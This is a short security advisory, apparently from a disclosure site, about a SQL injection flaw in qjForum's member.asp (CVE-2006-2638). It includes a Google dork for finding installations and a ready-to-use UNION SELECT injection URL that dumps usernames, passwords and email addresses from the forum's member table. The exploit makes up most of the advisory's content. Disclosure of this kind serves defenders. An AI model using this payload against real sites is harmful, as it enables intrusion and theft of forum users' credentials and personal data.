Topic : | qjForum(member.asp) SQL Injection Vulnerability
|
SecurityAlert : 972
CVE : CVE-2006-2638
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : ajann
Published : 31.05.2006
Affected Software : | qjForum |
 Advisory Content : Pls qjForum to Register and Log İn
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# Dork : "qjForum"
# Exploit;
SQL--------------------------------------------------------
###
http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0
,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
# ajann,Turkey
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|